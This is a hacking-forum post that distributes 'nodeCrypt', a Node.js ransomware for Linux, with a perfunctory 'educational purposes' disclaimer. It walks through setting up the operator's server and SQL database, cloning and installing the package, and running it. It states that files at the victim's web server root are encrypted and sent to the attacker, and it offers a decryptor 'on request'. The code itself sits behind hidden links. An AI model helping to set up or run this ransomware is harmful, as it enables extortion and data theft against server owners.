• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Ransomware NodeCrypt - Linux Ransomware

Status
Not open for further replies.

dEEpEst

☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Mar 29, 2018
Messages
13,860
Solutions
4
Reputation
27
Reaction score
45,546
Points
1,813
Credits
55,090
‎7 Years of Service‎
 
56%
This link is hidden for visitors. Please Log in or register now.






What is nodeCrypto?


nodeCrypt is a linux Ransomware written in NodeJs that encrypt predefined files.
This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.


Install server


Upload all file of 
This link is hidden for visitors. Please Log in or register now.
 folder on your webserver.
Create a sql database and import 
This link is hidden for visitors. Please Log in or register now.

Edit 
This link is hidden for visitors. Please Log in or register now.
 and add your SQL ID.


Install and run


git clone
This link is hidden for visitors. Please Log in or register now.

cd nodeCrypto && npm install

You must edit first variable in index.js
Once your configuration is complete, you can start the ransomware.

node index.js

The files at the root of the web server will encrypt and send to the server.


Screenshot


This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.



To Do


  •  Client (victim)



     Encrypt webserver
  •  Use private key for encryption
  •  Adapt SSL

[*] Server


  •  Recover data (user + encrypted file)
  •  Format the database
  •  Make GUI for webserver

[*] Make an executable to decrypt the files (Only on request! Contact me)



To see this hidden content, you must like this content.
 
Status
Not open for further replies.
Back
Top